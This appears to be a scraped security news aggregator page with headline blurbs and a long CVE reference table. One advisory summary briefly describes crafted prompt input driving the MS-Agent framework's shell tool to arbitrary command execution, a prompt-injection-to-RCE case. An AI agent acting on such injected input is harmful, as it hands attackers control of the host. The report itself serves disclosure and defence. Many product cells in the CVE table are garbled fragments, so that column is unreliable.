CIO Korea and IBM Korea held the “Agentic AI Leadership Exchange” breakfast forum on March 5 at the Grand InterContinental Seoul Parnas in Seoul. The event, aimed at CIOs, CDOs, and AX/DX leaders in the manufacturing and retail industries, drew about 30 industry participants, who discussed strategies for adopting and scaling agentic AI under the central theme of moving beyond “what can it do” to “how do we turn it into real results.” At the event, EY Consulting partner Lee Chang-ho and four IBM Korea technology leaders took the stage as speakers to discuss agen...

Read Full Article →
Chrome to start bi-weekly updates in September

Starting in September, Google’s Chrome browser will receive a new release every two weeks, the company has announced. Since 2021, Chrome has been on a four-week release schedule for new major versions. The rationale for the faster two-week cycle is to enable faster delivery of performance improv...

Read Full Article →
Apple's budget-friendly MacBook Neo is bursting with color and compromise

Cupertino grabs an aging A18 Pro from parts bin to power its latest attempt at an entry-level MacBook. You'll soon be able to get a MacBook that's cheaper than many budget PCs. Apple on Wednesday unveiled the MacBook Neo, a $599 exercise in cost cutting powered by the same silicon as an iPhone 16 ...

Read Full Article →
Reddit users hate NordVPN. Are their criticisms legit?

I was browsing on Reddit recently, as one does, and noticed yet another cynical comment dissing NordVPN. It compelled me to consider why exactly Nord in particular, and other popular VPNs in general, have this adverse public perception, and whether it’s actually fair. There is a trend in the onl...

Read Full Article →
This free tool checks if a link is safe in seconds

So, you’ve received a suspicious link and would like to check whether the website is dangerous before visiting it. You can do this, for example, with the “URL Void” service from the security provider “No Virus Thanks.” To do this, go to www.urlvoid.com, enter the web address in question, and cli...

Read Full Article →

#Threat Intel & Vulnerability

How to Scale SOC Automation with Falcon Fusion SOAR
Introducing "AI Unlocked: Decoding Prompt Injection," a New Interactive Challenge
The Art of Deception: How Threat Actors Master Typosquatting Campaigns to Bypass Detection
CrowdStrike FalconID Brings Phishing-Resistant MFA to Falcon Next-Gen Identity Security
CrowdStrike Achieves NCSC CIR Assurance for Incident Response
MDR vs. MXDR: Navigating the Landscape of Managed Threat Detection and Response Solutions

MDR (Managed Detection and Response) delivers focused protection at the endpoint level. MXDR (Managed Extended Detection and Response) broadens that visibility across networks, cloud environments, identities, email, and more. Choosing the Right Fit: MDR is well‑suited for smaller or less complex ...

Read Full Article →
Phobos ransomware administrator pleads guilty in US court

Key operator in global ransomware scheme admits to role in multimillion-dollar extortion campaign.

Read Full Article →
Beware of fake OpenClaw installers, even if Bing points you to GitHub

Bing search results pointed victims to GitHub repositories claiming to host OpenClaw installers, but in reality they installed malware.

Read Full Article →
VU#772695: A flawed TLS handshake implementation affects Viber Proxy in multiple platforms

Overview: The Rakuten Viber messaging app for Android V25.7.2.0g and Windows V25.6.0.0-V25.8.1.0 has a flaw in its TLS handshake implementation when using the Cloak proxy configuration. This flaw allows for easy identification of proxy usage, potentially compromising user anonymity. Description R...

Read Full Article →
On the Effectiveness of Mutational Grammar Fuzzing

Mutational grammar fuzzing is a fuzzing technique in which the fuzzer uses a predefined grammar that describes the structure of the samples. When a sample gets mutated, the mutations happen in such a way that any resulting samples still adhere to the grammar rules, thus the structure of the sampl...

Read Full Article →
Differentiating Between a Targeted Intrusion and an Automated Opportunistic Scanning [Guest Diary], (Wed, Mar 4th)

[This is a Guest Diary by Joseph Gruen, an ISC intern as part of the SANS.edu BACS program]

Read Full Article →
5 practical cybersecurity steps for small financial services businesses

If you run an accounting firm, tax practice, bookkeeping service, mortgage brokerage, financial advisory office, or small insurance agency, your business runs on trust. You handle tax returns, payroll data, bank details, loan applications, investment accounts, and insurance policies. That makes y...

Read Full Article →
Attackers abuse OAuth’s built-in redirects to launch phishing and malware attacks

Researchers have found that attackers are abusing OAuth to send users from legitimate Microsoft or Google login pages to phishing sites or malware downloads.

Read Full Article →
High-severity Qualcomm bug hits Android devices in targeted attacks

Google has patched 129 Android vulnerabilities, including an actively exploited flaw in a widely used Qualcomm component.

Read Full Article →
Bruteforce Scans for CrushFTP, (Tue, Mar 3rd)

CrushFTP is a Java-based open source file transfer system. It is offered for multiple operating systems. If you run a CrushFTP instance, you may remember that the software has had some serious vulnerabilities: CVE-2024-4040 (the template-injection flaw that let unauthenticated attackers escape th...

Read Full Article →
The Resilience Retainer: Incident Response Retainers, Reimagined

Too many organizations today still rely on "legacy" retainer models. These traditional contracts are often rigid, opaque, and reactive, and designed for a world that no longer exists.

Read Full Article →
Chrome flaw let extensions hijack Gemini’s camera, mic, and file access

Researchers found a now-patched vulnerability in "Live in Chrome" that allowed a Chrome extension to inherit Gemini’s permissions.

Read Full Article →
Talos on the developing situation in the Middle East

Cisco Talos continues to monitor the ongoing conflict in the Middle East. As always, we will be watching closely for any cyber-related incidents that are tied to the conflict.

Read Full Article →
[webapps] Easy File Sharing Web Server v7.2 - Buffer Overflow + 1 similar

Easy File Sharing Web Server v7.2 - Buffer Overflow

Read Full Article →
[webapps] WeGIA 3.5.0 - SQL Injection + 1 similar

WeGIA 3.5.0 - SQL Injection

Read Full Article →
[webapps] Boss Mini v1.4.0 - Local File Inclusion (LFI) + 1 similar

Boss Mini v1.4.0 - Local File Inclusion (LFI)

Read Full Article →
VU#431821: MS-Agent does not properly sanitize commands sent to its shell tool, allowing for RCE

Overview: A command injection vulnerability was identified in the MS-Agent framework that can be triggered through unsanitized prompt-derived input. An attacker can craft untrusted input introduced via a chat prompt or other external content sources, resulting in arbitrary command execution on the...

Read Full Article →
Criminal IP to Present Decision-Ready Threat Intelligence at RSAC™ 2026

Torrance, California, United States, 2nd March 2026, CyberNewswire. The post Criminal IP to Present Decision-Ready Threat Intelligence at RSAC™ 2026 appeared first on The Security Ledger with Paul F. Roberts.

Read Full Article →
Link11 Releases European Cyber Report 2026: DDoS Attacks Become a Constant Threat

Frankfurt am Main, Germany, 2nd March 2026, CyberNewswire. The post Link11 Releases European Cyber Report 2026: DDoS Attacks Become a Constant Threat appeared first on The Security Ledger with Paul F. Roberts.

Read Full Article →
Purchase order attachment isn’t a PDF. It’s phishing for your password

A fake purchase order attachment turned out to be a phishing page designed to harvest your login details.

Read Full Article →
📋 CVE Reference Bulletin (121 vulnerabilities)

⚠️ Reference material: Click CVE IDs for full details. Severity indicators are approximate classifications.

| CVE ID | Severity | Product | Source |
|---|---|---|---|
| CVE-2026-30847 | ⚪ Unknown | GHSL-2026-035 | VulnDB |
| CVE-2026-30846 | ⚪ Unknown | GHSL-2026-037 | VulnDB |
| CVE-2026-30845 | ⚪ Unknown | GHSL-2026-036 | VulnDB |
| CVE-2026-30844 | ⚪ Unknown | GHSL-2026-045 | VulnDB |
| CVE-2026-30843 | ⚪ Unknown | GHSL-2026-044 | VulnDB |
| CVE-2026-30833 | ⚪ Unknown | GHSA-hgq6-9jg2-wf3f | VulnDB |
| CVE-2026-30831 | ⚪ Unknown | GHSA-7qr6-q62g-hm63 | VulnDB |
| CVE-2026-30233 | 🔵 LOW | GHSA-jf73-858c-54pg | VulnDB |
| CVE-2026-30231 | ⚪ Unknown | GHSA-gwqr-xf5c-5569 | VulnDB |
| CVE-2026-30230 | ⚪ Unknown | GHSA-3x7v-x3r6-mjh7 | VulnDB |
| CVE-2026-30229 | 🔴 CRITICAL | parse-community parse-server | |
| CVE-2026-30228 | 🔴 CRITICAL | parse-community parse-server | |
| CVE-2026-30227 | ⚪ Unknown | jstedfast MimeKit | |
| CVE-2026-30225 | ⚪ Unknown | GHSA-p443-p7w5-2f7f | VulnDB |
| CVE-2026-30224 | ⚪ Unknown | GHSA-gq2m-77hf-vwgh | VulnDB |
| CVE-2026-30223 | ⚪ Unknown | OliveTin up | |
| CVE-2026-29795 | ⚪ Unknown | stellar rs—xdr | |
| CVE-2026-29791 | ⚪ Unknown | Agentgateway up | |
| CVE-2026-29790 | ⚪ Unknown | dbt-labs dbt-common | |
| CVE-2026-29789 | ⚪ Unknown | vitodeploy vito | |
| CVE-2026-29788 | ⚪ Unknown | miraheze TSPortal | |
| CVE-2026-29783 | ⚪ Unknown | GHSA-g8r9-g2v8-jv6f | VulnDB |
| CVE-2026-29182 | 🔴 CRITICAL | parse-community parse-server | |
| CVE-2026-29178 | 🔴 CRITICAL | GHSA-jvxv-2jjp-jxc3 | VulnDB |
| CVE-2026-29091 | ⚪ Unknown | GHSA-fp25-p6mj-qqg6 | VulnDB |
| CVE-2026-29089 | ⚪ Unknown | timescale timescaleDB | |
| CVE-2026-29087 | 🔴 CRITICAL | honojs node-server | |
| CVE-2026-29082 | ⚪ Unknown | GHSA-r36c-83hm-pc8j | VulnDB |
| CVE-2026-29075 | ⚪ Unknown | GHSA-3j55-5q6x-2h48 | VulnDB |
| CVE-2026-29064 | ⚪ Unknown | zarf-dev zarf | |
| CVE-2026-29063 | ⚪ Unknown | GHSA-wf6x-7x77-mvgw | VulnDB |
| CVE-2026-28514 | ⚪ Unknown | GHSA-w6vw-mrgv-69vf | VulnDB |
| CVE-2026-28289 | 🔴 CRITICAL | FreeScout .206 | CVE Feed (High/ |
| CVE-2026-27777 | ⚪ Unknown | Mobiliti e-mobi.hu | |
| CVE-2026-27764 | ⚪ Unknown | Mobiliti e-mobi.hu | |
| CVE-2026-27027 | ⚪ Unknown | icsa-26-062-08 | VulnDB |
| CVE-2026-26288 | ⚪ Unknown | icsa-26-062-08 | VulnDB |
| CVE-2026-26051 | ⚪ Unknown | Mobiliti e-mobi.hu | |
| CVE-2026-26018 | ⚪ Unknown | GHSA-h75p-j8xm-m278 | VulnDB |
| CVE-2026-26017 | ⚪ Unknown | GHSA-c9v3-4pv7-87pr | VulnDB |
| CVE-2026-24696 | ⚪ Unknown | icsa-26-062-08 | VulnDB |
| CVE-2026-22719 | ⚪ Unknown | to KEV Catalog | The Hacker News |
| CVE-2026-21513 | ⚪ Unknown | MSHTML 0-Day Exploited | The Hacker News |
| CVE-2026-21385 | ⚪ Unknown | in Qualcomm Android | The Hacker News |
| CVE-2026-20882 | ⚪ Unknown | Mobiliti e-mobi.hu | |
| CVE-2026-20748 | ⚪ Unknown | icsa-26-062-08 | VulnDB |
| CVE-2026-20079 | ⚪ Unknown | "Cisco Secure | CVE Feed (High/ |
| CVE-2026-3683 | ⚪ Unknown | bufanyun HotGo | |
| CVE-2026-3682 | ⚪ Unknown | welovemedia FFmate | |
| CVE-2026-3681 | ⚪ Unknown | welovemedia FFmate | |
| CVE-2026-3680 | ⚪ Unknown | RyuzakiShinji biome-mcp-server | |
| CVE-2026-3679 | 🔵 LOW | Tenda FH451 | |
| CVE-2026-3678 | 🔵 LOW | Tenda FH451 | |
| CVE-2026-3677 | 🔵 LOW | Tenda FH451 | |
| CVE-2026-3675 | ⚪ Unknown | Freedom Factory | |
| CVE-2026-3674 | ⚪ Unknown | Freedom Factory | |
| CVE-2026-3672 | 🔴 CRITICAL | JeecgBoot up | |
| CVE-2026-3671 | ⚪ Unknown | Freedom Factory | |
| CVE-2026-3670 | ⚪ Unknown | Freedom Factory | |
| CVE-2026-3669 | ⚪ Unknown | Freedom Factory | |
| CVE-2026-3668 | ⚪ Unknown | Freedom Factory | |
| CVE-2026-3667 | ⚪ Unknown | Freedom Factory | |
| CVE-2026-3665 | ⚪ Unknown | Issue 140 | VulnDB |
| CVE-2026-3664 | ⚪ Unknown | Issue 141 / ID 147 | VulnDB |
| CVE-2026-3663 | ⚪ Unknown | Issue 139 / ID 147 | VulnDB |
| CVE-2026-3662 | ⚪ Unknown | Wavlink WL-NU516U1 | |
| CVE-2026-3661 | ⚪ Unknown | Wavlink WL-NU516U1 | |
| CVE-2026-3419 | ⚪ Unknown | GHSA-573f-x89g-hqp9 | VulnDB |
| CVE-2026-3102 | ⚪ Unknown | macOS ExifTool | Kaspersky Offic |
| CVE-2026-2754 | ⚪ Unknown | Navtor NavBox | |
| CVE-2026-2753 | ⚪ Unknown | Navtor NavBox | |
| CVE-2026-2722 | ⚪ Unknown | EUVD-2026-10104 | VulnDB |
| CVE-2026-2721 | ⚪ Unknown | EUVD-2026-10103 | VulnDB |
| CVE-2026-2494 | 🔴 CRITICAL | ProfileGrid Plugin | |
| CVE-2026-2433 | ⚪ Unknown | RSS Aggregator | |
| CVE-2026-2431 | ⚪ Unknown | EUVD-2026-10100 | VulnDB |
| CVE-2026-2420 | ⚪ Unknown | LotekMedia Popup | |
| CVE-2026-2256 | ⚪ Unknown | Command injection | CVE Feed (High/ |
| CVE-2026-1825 | ⚪ Unknown | Show YouTube | |
| CVE-2026-1824 | ⚪ Unknown | Infomaniak Connect | |
| CVE-2026-1823 | ⚪ Unknown | Consensus Embed | |
| CVE-2026-1820 | ⚪ Unknown | Media Library | |
| CVE-2026-1805 | 🔴 CRITICAL | DA Media | |
| CVE-2026-1574 | ⚪ Unknown | MyQtip Plugin | |
| CVE-2026-1569 | ⚪ Unknown | Wueen Plugin | |
| CVE-2026-1087 | ⚪ Unknown | Guardian News | |
| CVE-2026-1086 | ⚪ Unknown | Font Pairing | |
| CVE-2026-1085 | ⚪ Unknown | True Ranker | |
| CVE-2026-1074 | ⚪ Unknown | WP App | |
| CVE-2026-1073 | ⚪ Unknown | Purchase Button | |
| CVE-2026-1071 | ⚪ Unknown | Carta Online | |
| CVE-2026-0651 | ⚪ Unknown | CVE-2026-0651, CVE-2026-0652, CVE-20day Fans | |
| CVE-2026-0006 | 🔵 LOW | Apache HTTP | CVE Feed (High/ |
| CVE-2025-70363 | ⚪ Unknown | Ibexa & | |
| CVE-2025-69654 | ⚪ Unknown | QuickJS prior | |
| CVE-2025-69653 | ⚪ Unknown | Issue 467 | VulnDB |
| CVE-2025-69652 | ⚪ Unknown | GNU Binutils | |
| CVE-2025-69651 | ⚪ Unknown | GNU Binutils | |
| CVE-2025-69650 | ⚪ Unknown | GNU Binutils | |
| CVE-2025-69649 | ⚪ Unknown | GNU Binutils | |
| CVE-2025-69646 | ⚪ Unknown | GNU Binutils | |
| CVE-2025-69645 | ⚪ Unknown | GNU Binutils | |
| CVE-2025-69644 | ⚪ Unknown | GNU Binutils | |
| CVE-2025-43529 | ⚪ Unknown | | Intruder Intel |
| CVE-2025-38352 | ⚪ Unknown | | Intruder Intel |
| CVE-2025-36911 | ⚪ Unknown | | Intruder Intel |
| CVE-2025-25257 | ⚪ Unknown | | Intruder Intel |
| CVE-2025-15602 | ⚪ Unknown | Grokability Snipe-IT | |
| CVE-2025-14675 | ⚪ Unknown | Meta Box | |
| CVE-2025-14500 | ⚪ Unknown | | Intruder Intel |
| CVE-2025-14174 | ⚪ Unknown | | Intruder Intel |
| CVE-2025-13350 | ⚪ Unknown | | Intruder Intel |
| CVE-2025-8899 | ⚪ Unknown | Paid Videochat | |
| CVE-2024-50629 | ⚪ Unknown | | Intruder Intel |
| CVE-2024-46982 | ⚪ Unknown | | Intruder Intel |
| CVE-2024-30085 | ⚪ Unknown | | Intruder Intel |
| CVE-2023-43000 | ⚪ Unknown | Apple Multiple | CISA Alerts & A |
| CVE-2023-41974 | ⚪ Unknown | Apple iOS | CISA Alerts & A |
| CVE-2021-30952 | 🔵 LOW | Apple Multiple | CISA Alerts & A |
| CVE-2021-22681 | ⚪ Unknown | Rockwell Multiple | CISA Alerts & A |
| CVE-2017-7921 | ⚪ Unknown | Hikvision Multiple | CISA Alerts & A |
💡 Tip: Use the CVE ID column as a quick reference. For detailed analysis, also check the editorial sections above for deeper coverage of significant vulnerabilities.